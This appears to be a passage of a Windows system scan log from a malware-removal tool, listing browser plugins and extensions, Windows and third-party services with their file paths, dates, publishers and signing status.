Tcpip\..\Interfaces\{6ad7d0b9-d1fb-40da-b893-a182542204a7}: [DhcpNameServer] 192.168.1.20 192.168.10.1
Internet Explorer:
==================
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://ww.google.cz/
SearchScopes: HKU\S-1-5-21-2417313614-488722605-2671369154-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-11-25] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-11-25] (Oracle Corporation)
FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-11-25] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-22] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default [2017-03-16]
CHR Extension: (Prezentace Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-03-15]
CHR Extension: (Dokumenty Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-03-15]
CHR Extension: (Disk Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-15]
CHR Extension: (YouTube) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-15]
CHR Extension: (Tabulky Google) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-03-15]
CHR Extension: (Dokumenty Google offline) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-16]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-15]
CHR Extension: (Gmail) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-15]
CHR Extension: (Chrome Media Router) - C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-03-15]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 gpsvc; C:\WINDOWS\System32\gpsvc.dll [1227264 2017-03-04] (Microsoft Corporation) [File not signed]
R2 nsi; C:\WINDOWS\System32\nsisvc.dll [30720 2016-07-16] (Microsoft Corporation) [File not signed]
U2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-07-01] (Autodesk Inc.)
U3 AJRouter; C:\WINDOWS\System32\AJRouter.dll [24576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ALG; C:\WINDOWS\System32\alg.exe [95744 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AppIDSvc; C:\WINDOWS\System32\appidsvc.dll [124416 2016-07-16] (Microsoft Corporation) [File not signed]
R3 Appinfo; C:\WINDOWS\System32\appinfo.dll [125952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppReadiness; C:\WINDOWS\system32\AppReadiness.dll [560128 2017-03-04] (Microsoft Corporation) [File not signed]
U3 AppXSvc; C:\WINDOWS\system32\appxdeploymentserver.dll [2278400 2017-03-04] (Microsoft Corporation) [File not signed]
U2 AudioEndpointBuilder; C:\WINDOWS\System32\AudioEndpointBuilder.dll [337920 2016-11-02] (Microsoft Corporation) [File not signed]
R2 Audiosrv; C:\WINDOWS\System32\Audiosrv.dll [942080 2016-11-02] (Microsoft Corporation) [File not signed]
U3 AxInstSV; C:\WINDOWS\System32\AxInstSV.dll [113664 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BDESVC; C:\WINDOWS\System32\bdesvc.dll [361472 2016-09-15] (Microsoft Corporation) [File not signed]
U2 BFE; C:\WINDOWS\System32\bfe.dll [795648 2016-07-16] (Microsoft Corporation) [File not signed]
U2 BITS; C:\WINDOWS\System32\qmgr.dll [1054208 2016-10-15] (Microsoft Corporation) [File not signed]
U2 BrokerInfrastructure; C:\WINDOWS\System32\bisrv.dll [770560 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Browser; C:\WINDOWS\System32\browser.dll [134656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFSrv; C:\WINDOWS\System32\BthHFSrv.dll [321536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthserv; C:\WINDOWS\system32\bthserv.dll [157184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 CDPSvc; C:\WINDOWS\System32\CDPSvc.dll [411648 2016-11-11] (Microsoft Corporation) [File not signed]
U2 CDPUserSvc; C:\WINDOWS\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation) [File not signed]
U3 CertPropSvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [6758568 2016-12-28] (COMODO)
U3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2876088 2016-12-28] (COMODO)
U2 CoreMessagingRegistrar; C:\WINDOWS\SysWOW64\coremessaging.dll [483840 2017-03-04] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\WINDOWS\system32\cryptsvc.dll [81920 2016-07-16] (Microsoft Corporation) [File not signed]
R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DcpSvc; C:\WINDOWS\system32\dcpsvc.dll [183808 2016-07-16] (Microsoft Corporation) [File not signed]
U3 defragsvc; C:\WINDOWS\System32\defragsvc.dll [511488 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DeviceAssociationService; C:\WINDOWS\system32\das.dll [447488 2016-09-27] (Microsoft Corporation) [File not signed]
U3 DeviceInstall; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DevQueryBroker; C:\WINDOWS\system32\DevQueryBroker.dll [34304 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\system32\dhcpcore.dll [360960 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dhcp; C:\WINDOWS\SysWOW64\dhcpcore.dll [292864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 diagnosticshub.standardcollector.service; C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [93184 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DiagTrack; C:\WINDOWS\system32\diagtrack.dll [1981440 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
U3 DmEnrollmentSvc; C:\WINDOWS\system32\Windows.Internal.Management.dll [407552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 DmEnrollmentSvc; C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll [298496 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmwappushservice; C:\WINDOWS\system32\dmwappushsvc.dll [57344 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [264704 2017-03-04] (Microsoft Corporation) [File not signed]
U2 DoSvc; C:\WINDOWS\system32\dosvc.dll [1231872 2016-12-14] (Microsoft Corporation) [File not signed]
U3 dot3svc; C:\WINDOWS\System32\dot3svc.dll [262144 2016-07-16] (Microsoft Corporation) [File not signed]
U2 DPS; C:\WINDOWS\system32\dps.dll [172032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsmSvc; C:\WINDOWS\System32\DeviceSetupManager.dll [197632 2016-07-16] (Microsoft Corporation) [File not signed]
U3 DsSvc; C:\WINDOWS\System32\DsSvc.dll [152576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EapHost; C:\WINDOWS\System32\eapsvc.dll [112128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EFS; C:\WINDOWS\system32\efssvc.dll [55296 2016-07-16] (Microsoft Corporation) [File not signed]
U3 embeddedmode; C:\WINDOWS\System32\embeddedmodesvc.dll [140800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 EntAppSvc; C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll [285696 2016-11-11] (Microsoft Corporation) [File not signed]
U2 EventLog; C:\WINDOWS\System32\wevtsvc.dll [1709056 2016-09-15] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\system32\es.dll [453632 2016-07-16] (Microsoft Corporation) [File not signed]
U2 EventSystem; C:\WINDOWS\SysWOW64\es.dll [347136 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Fax; C:\WINDOWS\system32\fxssvc.exe [644608 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdPHost; C:\WINDOWS\system32\fdPHost.dll [20992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 FDResPub; C:\WINDOWS\system32\fdrespub.dll [35328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fhsvc; C:\WINDOWS\system32\fhsvc.dll [122368 2016-07-16] (Microsoft Corporation) [File not signed]
U2 FontCache; C:\WINDOWS\system32\FntCache.dll [1840640 2017-03-04] (Microsoft Corporation) [File not signed]
U3 FrameServer; C:\WINDOWS\system32\FrameServer.dll [805888 2017-03-04] (Microsoft Corporation) [File not signed]
U3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [520416 2014-01-28] (Futuremark)
U3 hidserv; C:\WINDOWS\system32\hidserv.dll [36864 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidserv; C:\WINDOWS\SysWOW64\hidserv.dll [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupListener; C:\WINDOWS\system32\ListSvc.dll [274432 2016-11-02] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\system32\provsvc.dll [447488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HomeGroupProvider; C:\WINDOWS\SysWOW64\provsvc.dll [385536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HvHost; C:\WINDOWS\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation) [File not signed]
U3 icssvc; C:\WINDOWS\System32\tetheringservice.dll [202240 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IKEEXT; C:\WINDOWS\System32\ikeext.dll [932352 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
U4 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
U2 iphlpsvc; C:\WINDOWS\System32\iphlpsvc.dll [945664 2017-03-04] (Microsoft Corporation) [File not signed]
U3 irmon; C:\WINDOWS\System32\irmon.dll [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
U2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [223008 2015-06-24] (Intel Corporation)
U3 KeyIso; C:\WINDOWS\system32\keyiso.dll [96768 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KeyIso; C:\WINDOWS\SysWOW64\keyiso.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 KtmRm; C:\WINDOWS\system32\msdtckrm.dll [376320 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LanmanServer; C:\WINDOWS\system32\srvsvc.dll [305152 2016-07-16] (Microsoft Corporation) [File not signed]
R2 LanmanWorkstation; C:\WINDOWS\System32\wkssvc.dll [283648 2016-11-11] (Microsoft Corporation) [File not signed]
U3 lfsvc; C:\WINDOWS\System32\lfsvc.dll [37376 2016-07-16] (Microsoft Corporation) [File not signed]
U3 LicenseManager; C:\WINDOWS\system32\LicenseManagerSvc.dll [26112 2016-09-27] (Microsoft Corporation) [File not signed]
U3 lltdsvc; C:\WINDOWS\System32\lltdsvc.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 lmhosts; C:\WINDOWS\System32\lmhsvc.dll [27136 2016-07-16] (Microsoft Corporation) [File not signed]
U2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
U2 LSM; C:\WINDOWS\System32\lsm.dll [691712 2016-11-11] (Microsoft Corporation) [File not signed]
U2 MapsBroker; C:\WINDOWS\System32\moshost.dll [82944 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
U3 MessagingService; C:\WINDOWS\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MpsSvc; C:\WINDOWS\system32\mpssvc.dll [893952 2017-03-04] (Microsoft Corporation) [File not signed]
U3 MSDTC; C:\WINDOWS\System32\msdtc.exe [147456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSiSCSI; C:\WINDOWS\system32\iscsiexe.dll [151552 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\System32\msiexec.exe [65024 2016-07-16] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\WINDOWS\SysWOW64\msiexec.exe [58368 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcaSvc; C:\WINDOWS\System32\ncasvc.dll [167936 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcbService; C:\WINDOWS\System32\ncbservice.dll [339968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NcdAutoSetup; C:\WINDOWS\System32\NcdAutoSetup.dll [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\system32\netlogon.dll [827392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netlogon; C:\WINDOWS\SysWOW64\netlogon.dll [670720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Netman; C:\WINDOWS\System32\netman.dll [259072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 netprofm; C:\WINDOWS\System32\netprofmsvc.dll [519168 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetSetupSvc; C:\WINDOWS\System32\NetSetupSvc.dll [265728 2016-11-02] (Microsoft Corporation) [File not signed]
U3 NgcCtnrSvc; C:\WINDOWS\System32\NgcCtnrSvc.dll [330752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NgcSvc; C:\WINDOWS\system32\ngcsvc.dll [983040 2016-10-05] (Microsoft Corporation) [File not signed]
U2 NlaSvc; C:\WINDOWS\System32\nlasvc.dll [368640 2016-10-05] (Microsoft Corporation) [File not signed]
U3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [6053312 2016-08-22] (INCA Internet Co., Ltd.)
U2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
U2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
U2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-23] (NVIDIA Corporation)
U2 OneSyncSvc; C:\WINDOWS\System32\APHostService.dll [366592 2016-07-16] (Microsoft Corporation) [File not signed]
U2 OODefragAgent; C:\Program Files\OO Software\Defrag\oodag.exe [1660200 2014-08-29] (O&O Software GmbH)
U4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-02] (Electronic Arts)
U3 p2pimsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 p2psvc; C:\WINDOWS\system32\p2psvc.dll [425472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PerfHost; C:\WINDOWS\SysWow64\perfhost.exe [21504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PhoneSvc; C:\WINDOWS\System32\PhoneService.dll [781824 2016-09-27] (Microsoft Corporation) [File not signed]
U3 PimIndexMaintenanceSvc; C:\WINDOWS\System32\PimIndexMaintenance.dll [203264 2017-03-04] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\system32\pla.dll [1457152 2016-07-16] (Microsoft Corporation) [File not signed]
U3 pla; C:\WINDOWS\SysWOW64\pla.dll [1536512 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PlugPlay; C:\WINDOWS\system32\umpnpmgr.dll [111104 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPAutoReg; C:\WINDOWS\system32\pnrpauto.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PNRPsvc; C:\WINDOWS\system32\pnrpsvc.dll [345088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PolicyAgent; C:\WINDOWS\System32\ipsecsvc.dll [391168 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Power; C:\WINDOWS\system32\umpo.dll [123904 2016-07-16] (Microsoft Corporation) [File not signed]
U3 PrintNotify; C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll [3318784 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ProfSvc; C:\WINDOWS\system32\profsvc.dll [358400 2016-09-15] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\system32\qwave.dll [275456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 QWAVE; C:\WINDOWS\SysWOW64\qwave.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasAuto; C:\WINDOWS\System32\rasauto.dll [105472 2016-07-16] (Microsoft Corporation) [File not signed]
S3 RasMan; C:\WINDOWS\System32\rasmans.dll [658432 2017-03-04] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\System32\mprdim.dll [496128 2016-09-15] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\WINDOWS\SysWOW64\mprdim.dll [431104 2016-09-15] (Microsoft Corporation) [File not signed]
U4 RemoteRegistry; C:\WINDOWS\system32\regsvc.dll [155648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RetailDemo; C:\WINDOWS\system32\RDXService.dll [650752 2017-03-04] (Microsoft Corporation) [File not signed]
U3 RmSvc; C:\WINDOWS\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation) [File not signed]
R2 RpcEptMapper; C:\WINDOWS\System32\RpcEpMap.dll [79360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 RpcLocator; C:\WINDOWS\system32\locator.exe [11264 2016-07-16] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [888320 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SCardSvr; C:\WINDOWS\System32\SCardSvr.dll [250880 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ScDeviceEnum; C:\WINDOWS\System32\ScDeviceEnum.dll [201728 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Schedule; C:\WINDOWS\system32\schedsvc.dll [948224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SCPolicySvc; C:\WINDOWS\System32\certprop.dll [193536 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SDRSVC; C:\WINDOWS\System32\SDRSVC.dll [147968 2016-07-16] (Microsoft Corporation) [File not signed]
U3 seclogon; C:\WINDOWS\system32\seclogon.dll [31232 2016-07-16] (Microsoft Corporation) [File not signed]
R2 SENS; C:\WINDOWS\System32\sens.dll [70656 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensorDataService; C:\WINDOWS\System32\SensorDataService.exe [1312768 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SensorService; C:\WINDOWS\system32\SensorService.dll [417792 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SensrSvc; C:\WINDOWS\system32\sensrsvc.dll [179200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\system32\sessenv.dll [387072 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SessionEnv; C:\WINDOWS\SysWOW64\sessenv.dll [331776 2016-09-15] (Microsoft Corporation) [File not signed]
U3 SharedAccess; C:\WINDOWS\System32\ipnathlp.dll [541696 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [617472 2016-07-16] (Microsoft Corporation) [File not signed]
U2 ShellHWDetection; C:\WINDOWS\SysWOW64\shsvcs.dll [566784 2016-07-16] (Microsoft Corporation) [File not signed]
U4 shpamsvc; C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\System32\smphost.dll [23552 2016-08-06] (Microsoft Corporation) [File not signed]
U3 smphost; C:\WINDOWS\SysWOW64\smphost.dll [20992 2016-08-06] (Microsoft Corporation) [File not signed]
U3 SmsRouter; C:\WINDOWS\system32\SmsRouterSvc.dll [590848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SNMPTRAP; C:\WINDOWS\System32\snmptrap.exe [15872 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Spooler; C:\WINDOWS\System32\spoolsv.exe [792576 2017-03-04] (Microsoft Corporation) [File not signed]
U3 SSDPSRV; C:\WINDOWS\System32\ssdpsrv.dll [236544 2016-07-16] (Microsoft Corporation) [File not signed]
U3 SstpSvc; C:\WINDOWS\system32\sstpsvc.dll [209920 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\system32\windows.staterepository.dll [4136448 2016-11-11] (Microsoft Corporation) [File not signed]
U3 StateRepository; C:\WINDOWS\SysWOW64\windows.staterepository.dll [3370496 2016-11-11] (Microsoft Corporation) [File not signed]
U2 stisvc; C:\WINDOWS\System32\wiaservc.dll [646656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 StorSvc; C:\WINDOWS\system32\storsvc.dll [396800 2016-11-11] (Microsoft Corporation) [File not signed]
U3 svsvc; C:\WINDOWS\system32\svsvc.dll [13824 2016-07-16] (Microsoft Corporation) [File not signed]
U3 swprv; C:\WINDOWS\System32\swprv.dll [467456 2016-07-16] (Microsoft Corporation) [File not signed]
U4 SysMain; C:\WINDOWS\system32\sysmain.dll [944128 2016-07-16] (Microsoft Corporation) [File not signed]
U2 SystemEventsBroker; C:\WINDOWS\System32\SystemEventsBrokerServer.dll [387072 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TabletInputService; C:\WINDOWS\System32\TabSvc.dll [148992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\System32\tapisrv.dll [309248 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TapiSrv; C:\WINDOWS\SysWOW64\tapisrv.dll [254976 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TermService; C:\WINDOWS\System32\termsrv.dll [987648 2016-07-16] (Microsoft Corporation) [File not signed]
R2 Themes; C:\WINDOWS\system32\themeservice.dll [70656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TieringEngineService; C:\WINDOWS\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation) [File not signed]
U2 tiledatamodelsvc; C:\WINDOWS\system32\tileobjserver.dll [574976 2016-07-16] (Microsoft Corporation) [File not signed]
U3 TimeBrokerSvc; C:\WINDOWS\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation) [File not signed]
U2 TrkWks; C:\WINDOWS\System32\trkwks.dll [116736 2016-07-16] (Microsoft Corporation) [File not signed]
S3 TrustedInstaller; C:\WINDOWS\servicing\TrustedInstaller.exe [122880 2016-11-11] (Microsoft Corporation) [File not signed]
U4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [809424 2015-10-27] (Tunngle.net GmbH) [File not signed]
U4 tzautoupdate; C:\WINDOWS\system32\tzautoupdate.dll [95232 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UI0Detect; C:\WINDOWS\system32\UI0Detect.exe [42496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UmRdpService; C:\WINDOWS\System32\umrdp.dll [273408 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\System32\unistore.dll [1184256 2017-03-04] (Microsoft Corporation) [File not signed]
U3 UnistoreSvc; C:\WINDOWS\SysWOW64\unistore.dll [968704 2017-03-04] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\System32\upnphost.dll [440832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 upnphost; C:\WINDOWS\SysWOW64\upnphost.dll [328192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 UserDataSvc; C:\WINDOWS\System32\userdataservice.dll [1512448 2017-03-04] (Microsoft Corporation) [File not signed]
U2 UserManager; C:\WINDOWS\System32\usermgr.dll [1020928 2016-09-15] (Microsoft Corporation) [File not signed]
U3 UsoSvc; C:\WINDOWS\system32\usocore.dll [548864 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VaultSvc; C:\Windows\System32\vaultsvc.dll [358912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 vds; C:\WINDOWS\System32\vds.exe [649216 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicguestinterface; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicheartbeat; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmickvpexchange; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicrdv; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 vmicshutdown; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmictimesync; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
U3 vmicvmsession; C:\WINDOWS\System32\icsvc.dll [305152 2016-09-15] (Microsoft Corporation) [File not signed]
